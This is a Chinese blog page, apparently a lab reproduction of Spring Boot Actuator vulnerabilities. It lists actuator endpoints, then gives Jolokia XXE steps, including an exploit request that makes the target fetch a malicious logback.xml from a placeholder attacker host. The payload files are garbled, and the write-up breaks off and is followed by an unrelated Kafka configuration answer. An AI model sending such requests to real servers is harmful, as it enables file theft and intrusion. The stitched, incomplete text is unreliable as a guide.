bootstrap漏洞_常见Spring Boot漏洞复现

本文详细介绍了Spring Boot的几个常见漏洞复现过程,包括Jolokia的XXE和RCE漏洞,env端点敏感信息泄露,以及xstream反序列化漏洞。通过环境搭建、端点利用和漏洞攻击步骤,展示了如何利用这些漏洞获取系统权限。
摘要由CSDN通过智能技术生成

复现一下Sprint Boot的一些漏洞

  • 环境搭建

Dump环境

c447bf231cae06451e36d113fe8ec31e.png

Mvn构建项目

f39e5254e531e5a4f87434b69a8939e5.png

启动项目

ac2fd2e202cb7287d7c022d6bfd1313f.png

aa58181d8b83d404c6703593d9f860c7.png

  • 端点信息

路径 描述

/autoconfig 提供了一份自动配置报告,记录哪些自动配置条件通过了,哪些没通过

/beans 描述应用程序上下文里全部的Bean,以及它们的关系

/env 获取全部环境属性

/configprops 描述配置属性(包含默认值)如何注入Bean

/dump 获取线程活动的快照

/health 报告应用程序的健康指标,这些值由HealthIndicator的实现类提供

/info 获取应用程序的定制信息,这些信息由info打头的属性提供

/mappings 描述全部的URI路径,以及它们和控制器(包含Actuator端点)的映射关系

/metrics 报告各种应用程序度量信息,比如内存用量和HTTP请求计数

/shutdown 关闭应用程序,要求endpoints.shutdown.enabled设置为true

/trace 提供基本的HTTP请求跟踪信息(时间戳、HTTP头等)

  • Spring Boot 1.x版本端点在根URL下注册

2.x版本端点移动到/actuator/路径

59da13dfc2b7cd6460035502f0726eec.png

Jolokia漏洞利用

Jolokia漏洞利用(XXE)

  • jolokia/list

查看jolokia/list中存在的 Mbeans,是否存在logback 库提供的reloadByURL方法

45cd5252eceba744a5e8e3bf5af45ba0.png

  • 创建logback.xml和fileread.dtd文件

logback.xml

xml version="1.0" encoding="utf-8" ?>

%remote;%int;]>

&trick;

fileread.dtd

">

  • 将文件上传到公网VPS上并且开启http服务

cfdaead0c777b9e0b152033cac22f0b0.png

  • 远程访问logback.xml文件

127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/x.x.x.x!/logback.xml

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
好的,我可以为您提供关于Spring Boot集成Kafka的相关配置。 首先,在您的项目中添加Kafka的依赖: ```xml <dependency> <groupId>org.springframework.kafka</groupId> <artifactId>spring-kafka</artifactId> <version>2.5.2.RELEASE</version> </dependency> ``` 接下来,在您的application.properties文件中添加以下Kafka相关的配置: ```properties # Kafka Producer 配置 spring.kafka.producer.bootstrap-servers=localhost:9092 spring.kafka.producer.key-serializer=org.apache.kafka.common.serialization.StringSerializer spring.kafka.producer.value-serializer=org.springframework.kafka.support.serializer.JsonSerializer # Kafka Consumer 配置 spring.kafka.consumer.bootstrap-servers=localhost:9092 spring.kafka.consumer.group-id=my-group spring.kafka.consumer.auto-offset-reset=earliest spring.kafka.consumer.key-deserializer=org.apache.kafka.common.serialization.StringDeserializer spring.kafka.consumer.value-deserializer=org.springframework.kafka.support.serializer.JsonDeserializer spring.kafka.consumer.properties.spring.json.trusted.packages=* ``` 其中,producer和consumer的配置会略有不同,您需要根据自己的需求进行相应的配置。 最后,在您的代码中使用KafkaTemplate或者KafkaListener来发送和接收消息即可。比如: ```java @Service public class MyKafkaProducer { @Autowired private KafkaTemplate<String, MyMessage> kafkaTemplate; public void sendMessage(MyMessage message) { kafkaTemplate.send("my-topic", message); } } @Service public class MyKafkaConsumer { @KafkaListener(topics = "my-topic", groupId = "my-group") public void handleMessage(MyMessage message) { // 处理收到的消息 } } ``` 以上就是Spring Boot集成Kafka的基本配置和使用方法,希望对您有所帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值